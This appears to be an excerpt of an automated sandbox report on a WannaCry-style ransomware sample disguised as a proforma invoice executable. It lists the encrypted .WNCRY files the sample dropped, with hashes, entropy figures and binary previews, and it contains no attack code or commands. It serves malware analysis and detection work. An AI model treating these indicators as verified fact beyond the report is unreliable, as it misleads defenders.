                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.213687836159957
                                                          Encrypted:false
                                                          SSDEEP:6:bkE8sRWkDRriKcnfErGMj/KzVilsNjvflwr48+cDAc:bkE83kDfccrGMj/OViqN+4sH
                                                          MD5:1CD07CF5AEF717CC818F8CB471B101D3
                                                          SHA1:EE3FF77B5F3D45BB6F0351FCD5CE247CEA095D67
                                                          SHA-256:322513E35EB04043F1D2434036B5BBF8D40738E9A4C3D7623164E3947D8B145E
                                                          SHA-512:F53BC7EBFF44A639CA2D02E1D5A415543F2FC85B713BE787BD7C6FD76646D4D2B4AAC37EA0E9E5FDB0AD1E808C49E7CF8339282FA17539A0DD5E87C12F5AAB18
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....1.n ..[Y.V.9%..OH....z.O..C9T...].ujm....&.......?.Z......bNL.(../}a.L.........M..t....>.#}...R..A6..B.N.G..q..(.dm`..;...Z2...j.`...p..#...E...q_.(s..m5....d....O..hz7[\;_ ....LV....f7.HG.A:.......8y....../....pEc..J. J*.....jf.{.Z......6I.\.MX..............y.....( ^.5...)q.......u...\.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4194584
                                                          Entropy (8bit):7.999954724157412
                                                          Encrypted:true
                                                          SSDEEP:98304:6HaoVwPW6KeGiciSMj/SgYDjtVZAxVFZDgWWkN2ecR549N:ATVwN5GiF/SgYHbZezgYN2ecR2H
                                                          MD5:5E5E7D9F25E3FDBD830E851BF25858A8
                                                          SHA1:C8D40D95F771048F7AA27C9DCE0E0B2DFFB82066
                                                          SHA-256:20E31D8D639D85F9AB6D52CD7766B73B6D438A8EF7C36D8A37E439E9DF6462D7
                                                          SHA-512:DA31A76E46169D99EC469875E9A8212A9BC072829D4BE46A2ACEF0E833450FCC7488FE676603A97127E8DFE2DAD861E6D4D4B3F8039C81F817E27B1099B7E40A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........d....2Qa..F.s..^Q...s..o..Y.......$....c.....j.`+..|].jbfb..@..m9..nb.i.c4...5_.{./.db<..;..(>E~.J.n.Y........@.<....b...m\7.4...H..d............,....(.>..A..m.Q...IB.p98..A9.6R.`].k3.$..V.L..D.O(._h.+..=.m.......m...n.}."....=..T.0.`A`.......@......Q.k0\..=...?f....rm^....+.|..(.p..g..l..d..zo$..M.}.....-vS.\}.@.....B)..hw.=...{.n.e.].B.o.,XX..(......p*.v`au.Y..m.'.84.8.~..o]./...vb.RYWb../x).....%.....2w....YM(.y...9...,...9........G..W..u...L..G<"...1.0.s..0.....K%.4.j...N.. ..L.)6.h.#....h..M..Li.3.V|...4.....s...|.4........g-..v.f....JF...T{..fv..\......e..I>g..nCeP:...r^J...,..SQ....=Ro..1L..M|3.... ..._Q. ....2...R.Q...|..M).Us."..k.....Qs.e9.c`MslO..o..!Y.,.....2..y........IG....7.J.l.R........B?.K#.$].Gk..+......c..{..z5n..A....~..L......Be.M..I.:......\.(.......B.A+u.bX?...F..B.T.]x){..5.3...N.a.Cb....}...@.%Uk..E:kK...Q?..(...s..'i.u.j.7}.8......n..F...{1.Eb......u...=dmp.*.r{.u.\..yk$.!7..8..(.H.BoT...z.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4194584
                                                          Entropy (8bit):7.999954724157412
                                                          Encrypted:true
                                                          SSDEEP:98304:6HaoVwPW6KeGiciSMj/SgYDjtVZAxVFZDgWWkN2ecR549N:ATVwN5GiF/SgYHbZezgYN2ecR2H
                                                          MD5:5E5E7D9F25E3FDBD830E851BF25858A8
                                                          SHA1:C8D40D95F771048F7AA27C9DCE0E0B2DFFB82066
                                                          SHA-256:20E31D8D639D85F9AB6D52CD7766B73B6D438A8EF7C36D8A37E439E9DF6462D7
                                                          SHA-512:DA31A76E46169D99EC469875E9A8212A9BC072829D4BE46A2ACEF0E833450FCC7488FE676603A97127E8DFE2DAD861E6D4D4B3F8039C81F817E27B1099B7E40A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........d....2Qa..F.s..^Q...s..o..Y.......$....c.....j.`+..|].jbfb..@..m9..nb.i.c4...5_.{./.db<..;..(>E~.J.n.Y........@.<....b...m\7.4...H..d............,....(.>..A..m.Q...IB.p98..A9.6R.`].k3.$..V.L..D.O(._h.+..=.m.......m...n.}."....=..T.0.`A`.......@......Q.k0\..=...?f....rm^....+.|..(.p..g..l..d..zo$..M.}.....-vS.\}.@.....B)..hw.=...{.n.e.].B.o.,XX..(......p*.v`au.Y..m.'.84.8.~..o]./...vb.RYWb../x).....%.....2w....YM(.y...9...,...9........G..W..u...L..G<"...1.0.s..0.....K%.4.j...N.. ..L.)6.h.#....h..M..Li.3.V|...4.....s...|.4........g-..v.f....JF...T{..fv..\......e..I>g..nCeP:...r^J...,..SQ....=Ro..1L..M|3.... ..._Q. ....2...R.Q...|..M).Us."..k.....Qs.e9.c`MslO..o..!Y.,.....2..y........IG....7.J.l.R........B?.K#.$].Gk..+......c..{..z5n..A....~..L......Be.M..I.:......\.(.......B.A+u.bX?...F..B.T.]x){..5.3...N.a.Cb....}...@.%Uk..E:kK...Q?..(...s..'i.u.j.7}.8......n..F...{1.Eb......u...=dmp.*.r{.u.\..yk$.!7..8..(.H.BoT...z.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.243486291426241
                                                          Encrypted:false
                                                          SSDEEP:6:bkEkOFWYF14mNKBmoTi1sRY2biOIhr6JXuVj3RlpxigWbF/e/U2eIt0xZw9bJwKc:bkEpN14mNK/u1SY2Dkr6kVlxJo/e/U2Y
                                                          MD5:603BA0C463BB43B4A2BEC4954B206497
                                                          SHA1:8DC983FA9C85578B502DFAE230779EE7A13ACDF1
                                                          SHA-256:AD38F0E3D23CD5776A854DB2BCEF53058431B7C2A384AC1FB8EFAD31910FCCFB
                                                          SHA-512:2AFE1833C51EBFFA25E389E6B91CF88B2E29DE82E2E2587780173C53586FBDE4707279288B5A33CB8EE9C14CF89B53638362A6FDC6EC5D58F471C3FAB04564F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....u.z.A...2`_....6l2 ....sI^$\U..ZFC'..9b.7....,.$..,.2.H'..2-*...-....cf'...OSZ2Q(.....o..7O....1..\....h...Q.W.....r..y....)k.B...{.....1W.....C2.G6x.j..~..Ey..G|=..@.....5Hw.......!4..I..H...F.>as..R..:.ZN.....E.../#l...>8.{l.).F....WZ..].>.................#7.,...`*..V..w..;.w.yO..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.243486291426241
                                                          Encrypted:false
                                                          SSDEEP:6:bkEkOFWYF14mNKBmoTi1sRY2biOIhr6JXuVj3RlpxigWbF/e/U2eIt0xZw9bJwKc:bkEpN14mNK/u1SY2Dkr6kVlxJo/e/U2Y
                                                          MD5:603BA0C463BB43B4A2BEC4954B206497
                                                          SHA1:8DC983FA9C85578B502DFAE230779EE7A13ACDF1
                                                          SHA-256:AD38F0E3D23CD5776A854DB2BCEF53058431B7C2A384AC1FB8EFAD31910FCCFB
                                                          SHA-512:2AFE1833C51EBFFA25E389E6B91CF88B2E29DE82E2E2587780173C53586FBDE4707279288B5A33CB8EE9C14CF89B53638362A6FDC6EC5D58F471C3FAB04564F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....u.z.A...2`_....6l2 ....sI^$\U..ZFC'..9b.7....,.$..,.2.H'..2-*...-....cf'...OSZ2Q(.....o..7O....1..\....h...Q.W.....r..y....)k.B...{.....1W.....C2.G6x.j..~..Ey..G|=..@.....5Hw.......!4..I..H...F.>as..R..:.ZN.....E.../#l...>8.{l.).F....WZ..].>.................#7.,...`*..V..w..;.w.yO..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.227036544609894
                                                          Encrypted:false
                                                          SSDEEP:6:bkEKoo4dX9DwYS1P9xjJ5+Ch3nuaLozB5H3d6w7IWqyENpj6h8CcAl9TWq8:bkEQapS1PzBxndIr7CppY8CcAllWP
                                                          MD5:8C18D96D84F0D845C1EB7D79B96F4246
                                                          SHA1:8223D8B54430047627180E5A1EF52328A623CDF0
                                                          SHA-256:56D664FBD2140B94E0DD405B8FC63D400AE02CCF2A22A2A2B8CCC8792B906A51
                                                          SHA-512:1BE715C3CC6852BAD8C70E222A2FE9CECAB7E11C846EDE84E3A5D63328CC56E2CBFFD15B107E8966D26E5DC36F76C09B5B068941D1C019CC8A7FF1EED3C09B94
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........8C.._...4...4.]....P......TM.kv^r.........ay2.......#.Za..e..>]/.dN~..'neJ.!..}...w.no..a...g..@...."O........g.}...'..9....p+....X{W`._P....";M..6W.h...j....r[.'....:......-Fx..O...Wm?.p6..iNo....D+.5..X.^..7.W6..S.`f.*..5&..].o<.I............*K..+.L.M.-&...Op.mO.3s.J...a..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.227036544609894
                                                          Encrypted:false
                                                          SSDEEP:6:bkEKoo4dX9DwYS1P9xjJ5+Ch3nuaLozB5H3d6w7IWqyENpj6h8CcAl9TWq8:bkEQapS1PzBxndIr7CppY8CcAllWP
                                                          MD5:8C18D96D84F0D845C1EB7D79B96F4246
                                                          SHA1:8223D8B54430047627180E5A1EF52328A623CDF0
                                                          SHA-256:56D664FBD2140B94E0DD405B8FC63D400AE02CCF2A22A2A2B8CCC8792B906A51
                                                          SHA-512:1BE715C3CC6852BAD8C70E222A2FE9CECAB7E11C846EDE84E3A5D63328CC56E2CBFFD15B107E8966D26E5DC36F76C09B5B068941D1C019CC8A7FF1EED3C09B94
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........8C.._...4...4.]....P......TM.kv^r.........ay2.......#.Za..e..>]/.dN~..'neJ.!..}...w.no..a...g..@...."O........g.}...'..9....p+....X{W`._P....";M..6W.h...j....r[.'....:......-Fx..O...Wm?.p6..iNo....D+.5..X.^..7.W6..S.`f.*..5&..].o<.I............*K..+.L.M.-&...Op.mO.3s.J...a..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):29512
                                                          Entropy (8bit):7.993825009319092
                                                          Encrypted:true
                                                          SSDEEP:384:FwvI0HfnGQuteleC4Hw+iYnZBhqLmnKKDlqZbpA3h28NEnBkv2R6gLNcFUkV7hzL:uTlJ48YgKN0bpu2JtcUSWVH5cV
                                                          MD5:138108BE486A0043F4D5171D127E1253
                                                          SHA1:DC8CABB401C8358C7C8198DEE74BDD99037B8E3E
                                                          SHA-256:E119481E5ABC3519269A640F9C44B527F312694725A920A5CB588C1C8C640EFE
                                                          SHA-512:3A90E4987E2CA30A5D12A4711421CFDFD7C13FD5653670AB413265C92EFDC07886E3A986DA8C87FA7FFA5F9A60C233EBC365F687533E4360F4C12BE2875EC979
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......*v....EtU)Z..S._....C....3.}y.W.$..zn..%..;<.O..<W6v.G...V.../.6..."..v1Cc ...t..eb.<0.x...>...)......58.b1.-gDs..C....Rdx....I...j..?.'>v.I..&..5.5.#;......<:..,..*....C^...C..Y. .G...{.c.._..b..e..Q..L.C....].j.?....y...$....$U/S.<.-.]KA5%.....0r......3}~>R....x...D..#...--n.x.v.b.n......8..}.x.#..>>...?Vc.&s..F.....Q#.ic.....&...3) .C....".=.~.A.L2..*...v.Z...K.n..?..K.m.&.Q.bK.&...k<..f{%;%..3U.E=..?.H..Y.......&Q.s..S+.@.qbe..`.[....c..`...Q.?K..r5M.........H.O=...t.{. 0..|\....w......{.K7..=...W.....?,.F.[JU...l.S../z.........b.....a...%.......T.....Y..;ti..'.F"..J...!.[.........K....sG>......p5........:q..\4h...;.....y.4.-.d....}....|..k?m........O '...p.....L.Cz...u.f8p.W.Z..9.F..G.5.>j=GL.......@Y>.*6w...+.../....H...3.....^...f...a..."..Iw.."B....j..lz._co.|..X.g.r....'........b.......h.'\<d..n.;6y$...a.qNq.2.[.J..,T...".Y.<.8>...'....}ClF.5s..%)..7f>Dc.......V..v..pp..,.L.U.c.._.^..s...hc#.O.e..|......1Z.;..[...<,"d...>\.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):29512
                                                          Entropy (8bit):7.993825009319092
                                                          Encrypted:true
                                                          SSDEEP:384:FwvI0HfnGQuteleC4Hw+iYnZBhqLmnKKDlqZbpA3h28NEnBkv2R6gLNcFUkV7hzL:uTlJ48YgKN0bpu2JtcUSWVH5cV
                                                          MD5:138108BE486A0043F4D5171D127E1253
                                                          SHA1:DC8CABB401C8358C7C8198DEE74BDD99037B8E3E
                                                          SHA-256:E119481E5ABC3519269A640F9C44B527F312694725A920A5CB588C1C8C640EFE
                                                          SHA-512:3A90E4987E2CA30A5D12A4711421CFDFD7C13FD5653670AB413265C92EFDC07886E3A986DA8C87FA7FFA5F9A60C233EBC365F687533E4360F4C12BE2875EC979
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......*v....EtU)Z..S._....C....3.}y.W.$..zn..%..;<.O..<W6v.G...V.../.6..."..v1Cc ...t..eb.<0.x...>...)......58.b1.-gDs..C....Rdx....I...j..?.'>v.I..&..5.5.#;......<:..,..*....C^...C..Y. .G...{.c.._..b..e..Q..L.C....].j.?....y...$....$U/S.<.-.]KA5%.....0r......3}~>R....x...D..#...--n.x.v.b.n......8..}.x.#..>>...?Vc.&s..F.....Q#.ic.....&...3) .C....".=.~.A.L2..*...v.Z...K.n..?..K.m.&.Q.bK.&...k<..f{%;%..3U.E=..?.H..Y.......&Q.s..S+.@.qbe..`.[....c..`...Q.?K..r5M.........H.O=...t.{. 0..|\....w......{.K7..=...W.....?,.F.[JU...l.S../z.........b.....a...%.......T.....Y..;ti..'.F"..J...!.[.........K....sG>......p5........:q..\4h...;.....y.4.-.d....}....|..k?m........O '...p.....L.Cz...u.f8p.W.Z..9.F..G.5.>j=GL.......@Y>.*6w...+.../....H...3.....^...f...a..."..Iw.."B....j..lz._co.|..X.g.r....'........b.......h.'\<d..n.;6y$...a.qNq.2.[.J..,T...".Y.<.8>...'....}ClF.5s..%)..7f>Dc.......V..v..pp..,.L.U.c.._.^..s...hc#.O.e..|......1Z.;..[...<,"d...>\.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.229497419706369
                                                          Encrypted:false
                                                          SSDEEP:6:bkEhFN8SCJwVjQ0U0H8Zi+65hPJwRLjkLi/687qiqHfIVeccFnXG/bKoZH:bkETNdVjhU0HhRhiNsif+hfIMccd1i
                                                          MD5:33502A9300D2F309A2B175E6B654B853
                                                          SHA1:9DB8C9793AC81839FC4DDD9533BD416471E07311
                                                          SHA-256:6BBD0364326B8547F08028B53C41BF5E6798A10C1A55C4CF7A469F52E20458C1
                                                          SHA-512:C20524DB253633AF3EDC454C33E91CA16D23208A06B08F7C087820E16290767FD0BCEA55EE002AB171F9803D411F176177CCEF6A5EE73B500CFA5E9FD7749B2F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...... .....73.8+H.....J..E./C...Z.L...D...N.c.Yu..Q.KB..B..}5..6dp......`..........5%....d\.*...N~;..YC..V.W_.~..+k....%m..........?(.E5..i.~...5.S.P.wdC.Z.G....\..cY.V.....Op.....P.G-.l.V.xr..=.H.,.a...1 .......U...Y..E.yL...B..E......%.,...j.....&.jT.............<...KJ.{...!Q$Zc./]...-..^.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.229497419706369
                                                          Encrypted:false
                                                          SSDEEP:6:bkEhFN8SCJwVjQ0U0H8Zi+65hPJwRLjkLi/687qiqHfIVeccFnXG/bKoZH:bkETNdVjhU0HhRhiNsif+hfIMccd1i
                                                          MD5:33502A9300D2F309A2B175E6B654B853
                                                          SHA1:9DB8C9793AC81839FC4DDD9533BD416471E07311
                                                          SHA-256:6BBD0364326B8547F08028B53C41BF5E6798A10C1A55C4CF7A469F52E20458C1
                                                          SHA-512:C20524DB253633AF3EDC454C33E91CA16D23208A06B08F7C087820E16290767FD0BCEA55EE002AB171F9803D411F176177CCEF6A5EE73B500CFA5E9FD7749B2F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...... .....73.8+H.....J..E./C...Z.L...D...N.c.Yu..Q.KB..B..}5..6dp......`..........5%....d\.*...N~;..YC..V.W_.~..+k....%m..........?(.E5..i.~...5.S.P.wdC.Z.G....\..cY.V.....Op.....P.G-.l.V.xr..=.H.,.a...1 .......U...Y..E.yL...B..E......%.,...j.....&.jT.............<...KJ.{...!Q$Zc./]...-..^.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.189358079490809
                                                          Encrypted:false
                                                          SSDEEP:6:bkEXnaAuHj2NfBFZyL5p1pUmOyK0+Awa3Z76QJwPrtxsbQTSQw/G:bkEXnCjA4LbU2KC73Z71J8WbQTSQw+
                                                          MD5:411CF2BF6391FE04BC342B77BDC19391
                                                          SHA1:B83742E4803020C385D1513012B01E84356C9DC4
                                                          SHA-256:616A836C1C07932BBF6B1AF1F967A3DB29EBD2CB2C10811C011311223A47BD5C
                                                          SHA-512:7F67A2201668A10A41E45F939164A564A6C508438B9D8B8019D836868B3D313264C8C9C263A74948414264E9E8D80A1E94F291EAC3B460F39CD1D6FA3D8D77AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...... .|qY...UEJ.V.7e..5.v.(..FbI...... Q.&.JO.y.nD.Z}<.......].n?.......{.....H.$U.M...6>.n..I..s...O..Q..*....$..RV.).O....B.;~.p'.[N........0.U.......CX-i^.....;C[w...C....q.D.8.F...l.j.K-..eY.[B.U?."..HG........5..0..3.....|...R.v..,.~>....................A&;|....lN\/...+;9V.|.o.?..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.189358079490809
                                                          Encrypted:false
                                                          SSDEEP:6:bkEXnaAuHj2NfBFZyL5p1pUmOyK0+Awa3Z76QJwPrtxsbQTSQw/G:bkEXnCjA4LbU2KC73Z71J8WbQTSQw+
                                                          MD5:411CF2BF6391FE04BC342B77BDC19391
                                                          SHA1:B83742E4803020C385D1513012B01E84356C9DC4
                                                          SHA-256:616A836C1C07932BBF6B1AF1F967A3DB29EBD2CB2C10811C011311223A47BD5C
                                                          SHA-512:7F67A2201668A10A41E45F939164A564A6C508438B9D8B8019D836868B3D313264C8C9C263A74948414264E9E8D80A1E94F291EAC3B460F39CD1D6FA3D8D77AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...... .|qY...UEJ.V.7e..5.v.(..FbI...... Q.&.JO.y.nD.Z}<.......].n?.......{.....H.$U.M...6>.n..I..s...O..Q..*....$..RV.).O....B.;~.p'.[N........0.U.......CX-i^.....;C[w...C....q.D.8.F...l.j.K-..eY.[B.U?."..HG........5..0..3.....|...R.v..,.~>....................A&;|....lN\/...+;9V.|.o.?..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.1565650879686755
                                                          Encrypted:false
                                                          SSDEEP:6:bkEjXKlJw5bZmfQbLfQZLRNIHWUXMgAWkhuU3BjvRHMHpu3R8:bkETcUpbLfQpgNAWhU3TuEq
                                                          MD5:14FF6D9CE984DCE514C2D9370DBC439C
                                                          SHA1:F2425A984F9167354F0AACA45C13A16B52F8CD94
                                                          SHA-256:54F1747057BB75249174BEC2C1CFE110A1653278B30CB27C1EBAC64D804B7D83
                                                          SHA-512:DED0C6232A4275653EA94ADD242FD922C97500FE23C1BE4ACE4F311B502E59CBBD674F767B4C2C7AD78A1DF0F748AB03FE4BBB829D82A4FC5EC385F021D3AE1A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....7.m...uY..@..G...".._....&,U....K6.....f.<..t.....PA.[..f.[..D.^.{s$.U..a...77...kWx.R..)\L....C.YC..*LZ.G..7.z.X.....#Q..|bF.............s.1!z.^uRo.$....|:..s.$.!.f..*t..Q|*t.(...U:.gKX.1?-{..l....(....3GT..6d.?J.........z...g...dF...5v.lZ.................C..w...:1.1.4.1Z*.J.7.h5]

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.1565650879686755
                                                          Encrypted:false
                                                          SSDEEP:6:bkEjXKlJw5bZmfQbLfQZLRNIHWUXMgAWkhuU3BjvRHMHpu3R8:bkETcUpbLfQpgNAWhU3TuEq
                                                          MD5:14FF6D9CE984DCE514C2D9370DBC439C
                                                          SHA1:F2425A984F9167354F0AACA45C13A16B52F8CD94
                                                          SHA-256:54F1747057BB75249174BEC2C1CFE110A1653278B30CB27C1EBAC64D804B7D83
                                                          SHA-512:DED0C6232A4275653EA94ADD242FD922C97500FE23C1BE4ACE4F311B502E59CBBD674F767B4C2C7AD78A1DF0F748AB03FE4BBB829D82A4FC5EC385F021D3AE1A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....7.m...uY..@..G...".._....&,U....K6.....f.<..t.....PA.[..f.[..D.^.{s$.U..a...77...kWx.R..)\L....C.YC..*LZ.G..7.z.X.....#Q..|bF.............s.1!z.^uRo.$....|:..s.$.!.f..*t..Q|*t.(...U:.gKX.1?-{..l....(....3GT..6d.?J.........z...g...dF...5v.lZ.................C..w...:1.1.4.1Z*.J.7.h5]

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):418488
                                                          Entropy (8bit):7.9995948692936985
                                                          Encrypted:true
                                                          SSDEEP:12288:BpY5JyYSzcDDtFb1GWZ32zpbVKfH1o9Io+No:PY5uc3h5Z32Fb1So+No
                                                          MD5:79B7DAD6553A2AC44B694922F4343EAD
                                                          SHA1:5F8BAE41000F9CD1794954AE898BE8476A16C84B
                                                          SHA-256:49976727709A4ACFAB49E65A214656EC5AFD3AA5578C31166ADC07136E5B0375
                                                          SHA-512:0BBB7AEADEDA59D5794344FA6478E0FE8614157DCB99C7F7CB7313626F046953AE02DC6CBBA942D2A1AD05212D13736D0CCC03A421435858687CD672E7CF78F4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...............K...S^....._.<&;....-..3....,.LE:.,.D...mru.H."5.......4:b^7..#..(.X....ge.9.&.e+..A>...f..Rj..y...}H'X....B.[.....o.....U.d..JQ.)NV.&:d@a...<....0.se hb....+.E.R...D...&..I..........<...C.{>.&..<...f.:o?....!p...u..,.....p7..8.[.....a.......F....=......u.>p...o.[C+T<.^?.k.....;f....../.....'.... 2.5.=N~X...A/f..L..Y.Q...o......gu .%c..V.Mu._o.]m-+h....a.e].z%.L.._O"r.....IW.CN._LDA.....6{....{.~&RQ..&.C>~a...L....7Ai........h..X...._-.....&.,. .+,3....e..P'...&YS.h.)`DT_.H.|...z.s...f.6...>.E~l.E..#.E.Lw.C....&..P....XH.../.o.}.y..x....P........Q..<_.w..z.^o..fIi...k((..r.....Q..)..1..6...P..>..........<.x]...!E.....~......{q..,.O.om.GS...|.o...........|]. .......qOu>".......Fz5......A.....->K.{.W..4./.I.....^*:.`k.X.....&...cZ1X.v..l..N.....5..0v.;9.h/-jeux[.9.f...z.>G..._..-.&.ud.....*.&..y..d.V..t....k....2.~B.[k..v..P..8W.[...n.....p....-...Yz..F...e..9.....b.&....%.Z.24..tR...b..........|#...B.8..E

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):418488
                                                          Entropy (8bit):7.9995948692936985
                                                          Encrypted:true
                                                          SSDEEP:12288:BpY5JyYSzcDDtFb1GWZ32zpbVKfH1o9Io+No:PY5uc3h5Z32Fb1So+No
                                                          MD5:79B7DAD6553A2AC44B694922F4343EAD
                                                          SHA1:5F8BAE41000F9CD1794954AE898BE8476A16C84B
                                                          SHA-256:49976727709A4ACFAB49E65A214656EC5AFD3AA5578C31166ADC07136E5B0375
                                                          SHA-512:0BBB7AEADEDA59D5794344FA6478E0FE8614157DCB99C7F7CB7313626F046953AE02DC6CBBA942D2A1AD05212D13736D0CCC03A421435858687CD672E7CF78F4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...............K...S^....._.<&;....-..3....,.LE:.,.D...mru.H."5.......4:b^7..#..(.X....ge.9.&.e+..A>...f..Rj..y...}H'X....B.[.....o.....U.d..JQ.)NV.&:d@a...<....0.se hb....+.E.R...D...&..I..........<...C.{>.&..<...f.:o?....!p...u..,.....p7..8.[.....a.......F....=......u.>p...o.[C+T<.^?.k.....;f....../.....'.... 2.5.=N~X...A/f..L..Y.Q...o......gu .%c..V.Mu._o.]m-+h....a.e].z%.L.._O"r.....IW.CN._LDA.....6{....{.~&RQ..&.C>~a...L....7Ai........h..X...._-.....&.,. .+,3....e..P'...&YS.h.)`DT_.H.|...z.s...f.6...>.E~l.E..#.E.Lw.C....&..P....XH.../.o.}.y..x....P........Q..<_.w..z.^o..fIi...k((..r.....Q..)..1..6...P..>..........<.x]...!E.....~......{q..,.O.om.GS...|.o...........|]. .......qOu>".......Fz5......A.....->K.{.W..4./.I.....^*:.`k.X.....&...cZ1X.v..l..N.....5..0v.;9.h/-jeux[.9.f...z.>G..._..-.&.ud.....*.&..y..d.V..t....k....2.~B.[k..v..P..8W.[...n.....p....-...Yz..F...e..9.....b.&....%.Z.24..tR...b..........|#...B.8..E

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):416088
